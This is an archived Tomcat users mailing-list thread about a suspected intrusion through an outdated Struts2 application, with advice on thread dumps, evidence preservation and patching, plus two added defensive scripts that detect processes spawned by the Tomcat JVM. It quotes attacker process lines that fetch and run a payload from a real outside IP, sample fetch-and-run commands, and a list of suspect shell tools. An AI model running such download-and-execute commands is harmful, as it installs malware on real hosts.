To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
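
Leonardo's one-liner two messages up fires on any wget on the host and SIGQUITs the JVM every three seconds, which is why he ended up with a pile of dumps and no "live" capture. As an added example that is not code from the thread, the watcher below ties the check to the Tomcat JVM's own process tree, so only a command spawned from inside the JVM (the Runtime.exec() moment Chris asks to see in a thread dump) triggers a single dump, and it copies any script the command names (such as /tmp/4.sh) before it can be cleaned up. It assumes Linux procps ps/pgrep and one Tomcat JVM per host; SUSPECT_CMDS, EVIDENCE_DIR, the function names and the SAMPLE_PS listing used for the offline run are mine.

```shell
#!/bin/sh
# Added example, not code from the thread: watch the Tomcat JVM for child
# processes spawned through Runtime.exec() (the sh/wget that fetch and run
# /tmp/4.sh), take the thread dump at that exact moment, and preserve the
# evidence. Assumptions (mine): Linux with procps ps/pgrep, one Tomcat JVM
# per host, and rights to signal it. POSIX sh, no bashisms.

# Programs a web application should never spawn; tune for your deployment.
SUSPECT_CMDS='wget curl sh bash perl python nc'
EVIDENCE_DIR="${EVIDENCE_DIR:-/var/tmp/tomcat-ir}"

# Read `ps -e -ww -o pid,ppid,comm,args` output on stdin and print
# "<pid><TAB><args>" for every suspect process that descends from the JVM
# whose PID is $1 (children and grandchildren: java -> sh -> wget).
# Leonardo's loop matched any wget on the box; tying the match to the JVM's
# process tree separates an injected command from a legitimate cron job.
spawned_by_jvm() {
    awk -v parent="$1" -v suspects="$SUSPECT_CMDS" '
        BEGIN { n = split(suspects, s, " "); for (i = 1; i <= n; i++) bad[s[i]] = 1 }
        NR > 1 {                       # skip the ps header line
            pid = $1; pp[pid] = $2; comm[pid] = $3
            $1 = $2 = $3 = ""; sub(/^ +/, ""); args[pid] = $0
        }
        END {
            for (pid in pp) {
                if (!(comm[pid] in bad)) continue
                # walk up the parent chain until we reach the JVM or leave the table
                for (a = pp[pid]; a != parent && (a in pp); a = pp[a]) { }
                if (a == parent) print pid "\t" args[pid]
            }
        }' | sort -n
}

# Log the finding, copy any file named on the command line (e.g. /tmp/4.sh)
# before the attacker removes it, then SIGQUIT the JVM so HotSpot writes a
# thread dump to catalina.out while Runtime.exec() is still on the stack.
preserve_evidence() {
    jvm_pid=$1; child_pid=$2; child_args=$3
    stamp=$(date +%Y%m%dT%H%M%S)
    mkdir -p "$EVIDENCE_DIR"
    printf '%s jvm=%s pid=%s %s\n' "$stamp" "$jvm_pid" "$child_pid" "$child_args" \
        >> "$EVIDENCE_DIR/spawned.log"
    set -f                               # no globbing while splitting the args
    for word in $child_args; do
        case $word in
            /*) [ -f "$word" ] && cp -p "$word" "$EVIDENCE_DIR/$stamp.$(basename "$word")" ;;
        esac
    done
    set +f
    kill -3 "$jvm_pid"
}

# Poll once a second; dump only once per child PID so a long-running wget
# does not flood catalina.out with dumps (the problem Leonardo ran into).
watch_jvm() {
    jvm_pid=$(pgrep -o -f org.apache.catalina.startup.Bootstrap) || {
        echo "no Tomcat JVM found" >&2; return 1; }
    seen="$EVIDENCE_DIR/seen-pids"; mkdir -p "$EVIDENCE_DIR"; : >> "$seen"
    while :; do
        ps -e -ww -o pid,ppid,comm,args | spawned_by_jvm "$jvm_pid" |
        while IFS="$(printf '\t')" read -r child_pid child_args; do
            grep -qx "$child_pid" "$seen" && continue
            preserve_evidence "$jvm_pid" "$child_pid" "$child_args"
            echo "$child_pid" >> "$seen"
        done
        sleep 1
    done
}

# Constructed ps listing for an offline run: PID 4242 is Tomcat, 4300/4301
# are an injected `sh -c wget ...` chain, 5000 is an unrelated wget.
SAMPLE_PS='  PID  PPID COMMAND         COMMAND
    1     0 init            /sbin/init
 4242     1 java            /usr/bin/java -Dcatalina.home=/opt/tomcat org.apache.catalina.startup.Bootstrap start
 4300  4242 sh              sh -c wget -q http://192.0.2.10/4.sh -O /tmp/4.sh; sh /tmp/4.sh
 4301  4300 wget            wget -q http://192.0.2.10/4.sh -O /tmp/4.sh
 5000     1 wget            wget -q https://mirror.example.net/updates.tar.gz'

if [ "${1:-}" = "--watch" ]; then
    watch_jvm
else
    printf '%s\n' "$SAMPLE_PS" | spawned_by_jvm 4242
fi
```

Run with `--watch` on the affected host to arm it; without arguments it only evaluates the constructed listing and reports PIDs 4300 and 4301, not the unrelated wget.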


Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Ok, again it's uploaded.

This is the link

https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing

Kind regards!,

Leonardo




Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-05-05 11:57 GMT-03:00 Christopher Schultz <chris@christopherschultz.net>:


Re: Regarding i think an intrusion

Posted by Christopher Schultz <ch...@christopherschultz.net>.

Leonardo,

On 5/5/14, 10:29 AM, Leonardo Santagostini wrote:
> Well thread dump is here
> 
> https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing

Seems like it's broken.

-chris


Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Well thread dump is here

https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing

Let me know if I'm missing something.

Thanks!

Leonardo

Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-05-05 9:34 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:


Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all, sorry for the delay, but I was on holiday from Wednesday.

Ok, I made a ticket to developers for upgrading Struts. They told me that
they will work on that.

So, I will keep in touch with the news =)

Again, thanks all for all the support you give me.

Regards,
Leonardo

Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-05-01 18:48 GMT-03:00 Christopher Schultz <chris@christopherschultz.net>:


Re: Regarding i think an intrusion

Posted by Christopher Schultz <ch...@christopherschultz.net>.

Cédric,

On 5/1/14, 10:00 AM, Cédric Couralet wrote:
> 2014-04-30 19:07 GMT+02:00 Christopher Schultz <chris@christopherschultz.net>:
> 
>> Leonardo,
>> 
>> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
>>> I'm uploading my logfiles so it will be available when
>>> finished uploading.
>> 
>> Remember to get a thread dump while Runtime.exec() is running.
>> 
>> You should copy the script /tmp/4.sh somewhere else so you have a
>> copy in case the attacker tries to clean-up after themselves.
>> That's certainly what's doing the evil work.
>> 
>> You could probably set up iptables or something to restrict
>> outgoing requests so that the attack can't progress across your
>> network.
>> 
>>> Regarding the configuration, it's working in two other sites
>>> without problem, and there is no problem putting L4 balancing
>>> with haproxy.
>>> 
>>> I have asked developers about that exploit, still without
>>> answer.
>> 
>> You appear to be using struts2 2.1.8, which is in the range of
>> versions vulnerable to this bug. There is a workaround that you
>> can probably apply:
>> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
>> last section on this page).
>> 
>> Of course, the vulnerability doesn't allow you to simply inject
>> code or anything like that: you can certainly mess-around with code that
>> is already available on the site, though.
> 
> I think the S2-021 can be used to inject code. There is a POC
> circulating proving it. That said, this struts version (2.1.8) is
> also vulnerable to
> http://struts.apache.org/release/2.3.x/docs/s2-016.html which
> permits code execution very easily.

Ouch. Yeah, there's always that ;)

- -chris


Re: Regarding i think an intrusion

Posted by Cédric Couralet <ce...@gmail.com>.
2014-04-30 19:07 GMT+02:00 Christopher Schultz <chris@christopherschultz.net>:

>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> > Im uploading mi logfiles so it will be available when finished
> > uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a copy
> in case the attacker tries to clean-up after themselves. That's
> certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict outgoing
> requests so that the attack can't progress across your network.
>
> > Regarding the configuration, its working in two other sites
> > without problem, and there is no problem putting L4 balancing with
> > haproxy.
> >
> > I have asked developers about that exploit, still without answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you can
> probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
> section on this page).

> Of course, the vulnerability doesn't allow you to simply inject code
> or anything like that: you can certainly mess-around with code that is
> already available on the site, though.
>
>
I think the S2-021 can be used to inject code. There is a POC circulating
proving it.
That said, this struts version (2.1.8) is also vulnerable to
http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code
execution very easily.



> -chris

Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Christopher, thanks for your response.

I have a copy of 4.sh and squid (binary ELF file) and tried to see using
strings what this program does. I couldn't see anything =(

I'm monitoring the server to get a dump at the moment this injection
occurs.

Files still uploading =(

Thanks for all, kind regards


Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>


Re: Regarding i think an intrusion

Posted by Christopher Schultz <ch...@christopherschultz.net>.

Leonardo,

On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> Im uploading mi logfiles so it will be available when finished
> uploading.

Remember to get a thread dump while Runtime.exec() is running.

You should copy the script /tmp/4.sh somewhere else so you have a copy
in case the attacker tries to clean-up after themselves. That's
certainly what's doing the evil work.

You could probably set up iptables or something to restrict outgoing
requests so that the attack can't progress across your network.

> Regarding the configuration, its working in two other sites
> without problem, and there is no problem putting L4 balancing with
> haproxy.
> 
> I have asked developers about that exploit, still without answer.

You appear to be using struts2 2.1.8, which is in the range of
versions vulnerable to this bug. There is a workaround that you can
probably apply:
http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
section on this page).

Of course, the vulnerability doesn't allow you to simply inject code
or anything like that: you can certainly mess-around with code that is
already available on the site, though.

-chris

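The two checks this advice boils down to, as an added Python example that is not code from the thread: confirm from a `ps -ef` listing that the `sh`/`wget` child really descends from the JVM running Tomcat (and not some other Java process), and pull from a thread dump taken while that child is alive the application frames sitting above the `Runtime.exec`/`UNIXProcess` call that launched it. The listing and the dump are constructed samples; the pids, the `com.example.portal.*` classes and the placeholder download host are assumptions.

```python
"""Pin down which code path in a Tomcat JVM spawned a child process.

Added example, not code from the original thread. Input is a `ps -ef` listing
(does the sh/wget child really hang off the Tomcat JVM?) and a thread dump taken
while the child is alive (which web-app frames sit above Runtime.exec?). All
sample data is constructed; class, thread and path names are placeholders.
"""
import re
from typing import Dict, List, Tuple

TOMCAT_MARKER = "org.apache.catalina.startup.Bootstrap"
# A thread with one of these frames started, or is waiting on, a child process.
EXEC_PREFIXES = ("java.lang.Runtime.exec", "java.lang.ProcessBuilder.start",
                 "java.lang.UNIXProcess")
# Skipped when looking for the code that called exec. Struts/OGNL frames are
# deliberately not skipped: seeing them in that position is the clue.
PLATFORM_PREFIXES = ("java.", "javax.", "sun.", "org.apache.catalina.",
                     "org.apache.coyote.", "org.apache.tomcat.")

# Constructed `ps -ef` excerpt: a Tomcat JVM (8800) with a shell child, and an
# unrelated JVM whose shell child must not be flagged.
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
tomcat    8800     1  0 Apr27 ?        00:01:12 /usr/java/default/bin/java -Dcatalina.base=/opt/tomcat org.apache.catalina.startup.Bootstrap start
tomcat    8882  8800  0 Apr27 ?        00:00:00 sh /tmp/4.sh
tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://C2-HOST-PLACEHOLDER/squid32 -O /tmp/squid
jenkins   9100     1  0 Apr27 ?        00:00:05 /usr/bin/java -jar jenkins.war
jenkins   9150  9100  0 Apr27 ?        00:00:00 sh -c git fetch
"""

# Constructed HotSpot 1.6-style dump: a request thread blocked in waitFor() under
# application code, the JDK's own "process reaper" thread, and an idle thread.
SAMPLE_DUMP = """\
"http-8009-exec-7" daemon prio=10 tid=0x00007f0c4c0a9000 nid=0x22b2 in Object.wait()
   java.lang.Thread.State: WAITING (on object monitor)
    at java.lang.Object.wait(Native Method)
    at java.lang.UNIXProcess.waitFor(UNIXProcess.java:165)
    - locked <0x00000007a2d1e0b8> (a java.lang.UNIXProcess)
    at com.example.portal.action.ReportAction.execute(ReportAction.java:88)
    at java.lang.reflect.Method.invoke(Method.java:597)
    at com.example.portal.filter.CommandFilter.doFilter(CommandFilter.java:51)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at org.apache.coyote.ajp.AjpProcessor.process(AjpProcessor.java:190)

"process reaper" daemon prio=10 tid=0x00007f0c4c0b1800 nid=0x22b5 runnable
   java.lang.Thread.State: RUNNABLE
    at java.lang.UNIXProcess.waitForProcessExit(Native Method)
    at java.lang.Thread.run(Thread.java:662)

"http-8009-exec-2" daemon prio=10 tid=0x00007f0c4c0a7000 nid=0x22b0 waiting on condition
    at sun.misc.Unsafe.park(Native Method)
"""

THREAD_HEADER = re.compile(r'^"(?P<name>[^"]+)"')
FRAME = re.compile(r'^\s+at (?P<frame>.+)')

def parse_ps(ps_text: str) -> Dict[int, Tuple[int, str, str]]:
    """Map pid -> (ppid, user, cmd) from `ps -ef` output; header row skipped."""
    procs = {}
    for line in ps_text.splitlines()[1:]:
        fields = line.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(fields) == 8:
            procs[int(fields[1])] = (int(fields[2]), fields[0], fields[7])
    return procs

def tomcat_descendants(ps_text: str) -> List[dict]:
    """Processes whose ancestry runs through a Tomcat JVM. A child already
    reparented to pid 1 (as in the listing posted in the thread) is not found
    this way; for those, fall back on the owning user."""
    procs = parse_ps(ps_text)
    tomcat_pids = {pid for pid, (_, _, cmd) in procs.items() if TOMCAT_MARKER in cmd}
    hits = []
    for pid, (ppid, user, cmd) in procs.items():
        ancestor, seen = ppid, set()
        while pid not in tomcat_pids and ancestor in procs and ancestor not in seen:
            if ancestor in tomcat_pids:
                hits.append({"pid": pid, "user": user, "cmd": cmd, "tomcat_pid": ancestor})
                break
            seen.add(ancestor)
            ancestor = procs[ancestor][0]
    return hits

def threads_spawning_processes(dump_text: str) -> List[dict]:
    """Threads holding an exec/UNIXProcess frame, plus the non-platform frames
    on the same stack: that is the code that launched the child."""
    threads: List[Tuple[str, List[str]]] = []
    for line in dump_text.splitlines():
        header, frame = THREAD_HEADER.match(line), FRAME.match(line)
        if header:
            threads.append((header.group("name"), []))
        elif threads and frame:
            threads[-1][1].append(frame.group("frame").strip())
    report = []
    for name, frames in threads:
        exec_frames = [f for f in frames if f.startswith(EXEC_PREFIXES)]
        if exec_frames:  # the reaper thread matches too, but has no app frames
            app = [f for f in frames if not f.startswith(PLATFORM_PREFIXES)]
            report.append({"thread": name, "exec_frame": exec_frames[0], "app_frames": app})
    return report
```

On a real box the inputs come from `ps -ef` and from the dump Tomcat writes to catalina.out on `kill -3 <jvm pid>`; the first `app_frames` entry of the request thread is the action or filter to read next.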

Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Martin/Felix,

I'm uploading my logfiles so they will be available when finished uploading.

Regarding the configuration, it's working in two other sites without
problems, and there is no problem putting L4 balancing with haproxy.

I have asked the developers about that exploit, still without answer.

I will let you know how things are going, thanks for all =)

Regards/Saludos!

BTW: Martin, thanks for your Spanish words!!!! Really appreciated =)

Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>


Re: Regarding i think an intrusion

Posted by Felix Schumacher <fe...@internetallee.de>.

On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini <ls...@gmail.com> wrote:
>Hello list,
>
>well my homework is done
>
>Here are the links:
>
>setenv.sh: http://pastebin.com/EN1mXDFi
>catalina.sh: http://pastebin.com/1vRVLbSm
>web.xml: http://pastebin.com/BqEfiXXm
>server.xml: http://pastebin.com/wfzE8bYU
>logging.properties: http://pastebin.com/Qurk8sLU
>catalina.properties: http://pastebin.com/jkfY1ZRQ
>tree + logsfiles: http://pastebin.com/j3tip4ij

From the logfiles it looks like you have struts2 applications. It might be that you are hit by a security problem within struts2 ( Konstantin forwarded a warning a few days ago http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html ).

>
>Note that logsfiles, are not the logfiles itsef but only a ls -lah
>(just
>for you to see the logsizes)
>
>A little more about the infraestructure i've mounted ill do some ascii
>art.
>
>
>internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
>(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)

That seems a bit too complex. In my eyes you need no haproxy between httpd and tomcat when you use mod_jk.

Regards
 Felix


RE: Regarding i think an intrusion

Posted by Martin Gainty <mg...@hotmail.com>.
> Date: Wed, 30 Apr 2014 12:35:52 -0300
> Subject: Re: Regarding i think an intrusion
> From: lsantagostini@gmail.com
> To: users@tomcat.apache.org
> 
> Hello list,
> 
> well my homework is done
> 
> Here are the links:
> 
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logsfiles: http://pastebin.com/j3tip4ij

MG> Please paste the contents of the following log files on Pastebin and send us the link:

-rw-rw-r-- 1 tomcat tomcat  5.0K Apr 30 05:38 localhost.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat     0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat   43M Apr 30 12:18 portal-ht.log
-rw-rw-r-- 1 tomcat tomcat  583K Apr 30 10:09 portal-mh.log
-rw-rw-r-- 1 tomcat tomcat   58M Apr 30 12:19 portal-pdi.log
-rw-rw-r-- 1 tomcat tomcat  3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat  3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat  591K Apr 30 12:18 RT_access_log.2014-04-30.txt

MG> Kind regards from the USA


Re: Regarding i think an intrusion

Posted by Christopher Schultz <ch...@christopherschultz.net>.

Leonardo,

You need to post a thread dump as well.

-chris

On 4/30/14, 11:35 AM, Leonardo Santagostini wrote:
> Hello list,
> 
> well my homework is done
> 
> Here are the links:
> 
> setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: 
> http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm
>  server.xml: http://pastebin.com/wfzE8bYU logging.properties: 
> http://pastebin.com/Qurk8sLU catalina.properties: 
> http://pastebin.com/jkfY1ZRQ tree + logsfiles: 
> http://pastebin.com/j3tip4ij
> 
> Note that logsfiles, are not the logfiles itsef but only a ls -lah 
> (just for you to see the logsizes)
> 
> A little more about the infraestructure i've mounted ill do some 
> ascii art.
> 
> 
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk 
> (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
> 
> 
> Apache(2) is serving static content so haproxy(1) at the first 
> level does http round robin balancing Apache(2) connects to 
> tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3)
>  Tomcat(5) are the main app server (the ones gets intruded) who 
> uses tomcat(7) (solr service) using haproxy(6) using L4 
> connection.
> 
> Versions:
> 
> Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 
> 1.6.0.41
> 
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version 
> java version "1.6.0_41" Java(TM) SE Runtime Environment (build 
> 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, 
> mixed mode)
> 
> OS: CentOS 5.8 64 bit
> 
> [root@arcbaappvrt05 tomcat]# uname -a Linux 
> arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 
> 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux 
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS
> release 5.8 (Final) [root@arcbaappvrt05 tomcat]#
> 
> For now i havent see that the squid process whas launched so i 
> couldnt do a dump
> 
> Letme know if you need more information.
> 
> BTW, pastebin links will work for one week.
> 
> Kind regards, yours
> 
> 
> 
> 
> Saludos.- Leonardo Santagostini
> 
> <http://ar.linkedin.com/in/santagostini>
> 
> 
> 
> 
> 
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini 
> <ls...@gmail.com>:
> 
>> Ok, i will do the following:
>> 
>> 1) thread dump of running tomcat instance 2) Pastebin the
>> running tomcat config
>> 
>> I think at mid day will have all the info.
>> 
>> Thanks all for replying me and all the responses.
>> 
>> Regards, Leonardo
>> 
>> Saludos.- Leonardo Santagostini
>> 
>> <http://ar.linkedin.com/in/santagostini>
>> 
>> 
>> 
>> 
>> 
>> 2014-04-30 10:55 GMT-03:00 Christopher Schultz < 
>> chris@christopherschultz.net>:
>> 
>> -----BEGIN PGP SIGNED MESSAGE-----
>>> Hash: SHA256
>>> 
>>> Konstantin,
>>> 
>>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>>>> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini 
>>>> <ls...@gmail.com>:
>>>>> Hello Dan,
>>>>> 
>>>>> Nope, the attacker is executing the following locally
>>>>> 
>>>>> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
>>>>> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
>>>>> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>>>>> 
>>>>> And then it launches squid, which tries to connect via ssh to
>>>>> various places.
>>>>> 
>>>>> Right now it's time to leave the office, but in a few hours
>>>>> I will paste on pastebin access logs, config files,
>>>>> whatever you tell me.
>>>>> 
>>>>> This is my pstree
>>>>> 
>>>>> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
>>>>> init─┬─atd
>>>>>      ├─java─┬─sh───wget
>>>>>      │      └─263*[{java}]
>>>> 
>>>> sh launched by tomcat's java?
>>> 
>>> Yes: please verify that it's the JVM running Tomcat, and not 
>>> just any JVM process.
>>> 
>>>> Take a thread dump:
>>>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>>>>
>>>> It shall show the stack trace of the thread that launched the external
>>>> process.
>>> 
>>> +1
>>> 
>>> The only things that ship with Tomcat that call Process.exec() 
>>> are the CGI servlet and SSI, both of which are disabled by 
>>> default. So, either you have an insecure CGI/SSI
>>> configuration, your web application has a vulnerability, or you
>>> have deployed something like the Manager application and
>>> improperly-secured it.
>>> 
>>> A classic example of such an intrusion might be that someone 
>>> got a foothold elsewhere into your network, and the Manager
>>> web application is not properly secured with a password, etc.
>>> 
>>> -chris

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org


Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello list,

Well, my homework is done.

Here are the links:

setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij

Note that logsfiles is not the log files themselves but only an ls -lah (just
for you to see the log sizes).

A little more about the infrastructure I've set up; I'll do some ASCII art.


internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)


Apache(2) serves static content, so haproxy(1) at the first level does
HTTP round-robin balancing.
Apache(2) connects to Tomcat(5) through haproxy(4) (an L4 connection)
using mod_jk(3).
Tomcat(5) are the main app servers (the ones that get intruded), which use
Tomcat(7) (Solr service) through haproxy(6), also an L4 connection.

Versions:

Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41

[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version "1.6.0_41"
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

OS: CentOS 5.8 64 bit

[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#

For now I haven't seen the squid process launched, so I couldn't do a
dump.

Let me know if you need more information.

BTW, pastebin links will work for one week.

Kind regards, yours




Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:

> OK, I will do the following:
>
> 1) thread dump of running tomcat instance
> 2) Pastebin the running tomcat config
>
> I think by midday I will have all the info.
>
> Thanks all for replying to me and for all the responses.
>
> Regards, Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> chris@christopherschultz.net>:
>
>>
>> Konstantin,
>>
>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
>> > <ls...@gmail.com>:
>> >> Hello Dan,
>> >>
>> >> Nope, the attacker is executing the following locally
>> >>
>> >> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
>> >> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>> >>
>> >> And then it launches squid, which tries to connect via ssh to various
>> >> places.
>> >>
>> >> Right now it's time to leave the office, but in a few hours I will
>> >> paste on pastebin access logs, config files, whatever you tell
>> >> me.
>> >>
>> >> This is my pstree
>> >>
>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
>> >> init─┬─atd
>> >>      ├─java─┬─sh───wget
>> >>      │      └─263*[{java}]
>> >
>> > sh launched by tomcat's java?
>>
>> Yes: please verify that it's the JVM running Tomcat, and not just any
>> JVM process.
>>
>> > Take a thread dump:
>> > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>> >
>> > It shall show the stack trace of the thread that launched the external
>> > process.
>>
>> +1
>>
>> The only things that ship with Tomcat that call Process.exec() are the
>> CGI servlet and SSI, both of which are disabled by default. So, either
>> you have an insecure CGI/SSI configuration, your web application has a
>> vulnerability, or you have deployed something like the Manager
>> application and improperly-secured it.
>>
>> A classic example of such an intrusion might be that someone got a
>> foothold elsewhere into your network, and the Manager web application
>> is not properly secured with a password, etc.
>>
>> -chris
>

Re: Regarding i think an intrusion

Posted by Leonardo Santagostini <ls...@gmail.com>.
OK, I will do the following:

1) thread dump of running tomcat instance
2) Pastebin the running tomcat config

I think by midday I will have all the info.

Thanks all for replying to me and for all the responses.

Regards, Leonardo

Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-04-30 10:55 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
>:

>
> Konstantin,
>
> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> > <ls...@gmail.com>:
> >> Hello Dan,
> >>
> >> Nope, the attacker is executing the following locally
> >>
> >> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
> >> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >>
> >> And then it launches squid, which tries to connect via ssh to various
> >> places.
> >>
> >> Right now it's time to leave the office, but in a few hours I will
> >> paste on pastebin access logs, config files, whatever you tell
> >> me.
> >>
> >> This is my pstree
> >>
> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> >> init─┬─atd
> >>      ├─java─┬─sh───wget
> >>      │      └─263*[{java}]
> >
> > sh launched by tomcat's java?
>
> Yes: please verify that it's the JVM running Tomcat, and not just any
> JVM process.
>
> > Take a thread dump:
> > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >
> > It shall show the stack trace of the thread that launched the external
> > process.
>
> +1
>
> The only things that ship with Tomcat that call Process.exec() are the
> CGI servlet and SSI, both of which are disabled by default. So, either
> you have an insecure CGI/SSI configuration, your web application has a
> vulnerability, or you have deployed something like the Manager
> application and improperly-secured it.
>
> A classic example of such an intrusion might be that someone got a
> foothold elsewhere into your network, and the Manager web application
> is not properly secured with a password, etc.
>
> -chris

Re: Regarding i think an intrusion

Posted by Christopher Schultz <ch...@christopherschultz.net>.
Konstantin,

On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> <ls...@gmail.com>:
>> Hello Dan,
>> 
>> Nope, the attacker is executing the following locally
>> 
>> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh 
>> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget 
>> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>> 
>> And then it launches squid, which tries to connect via ssh to various
>> places.
>> 
>> Right now it's time to leave the office, but in a few hours I will
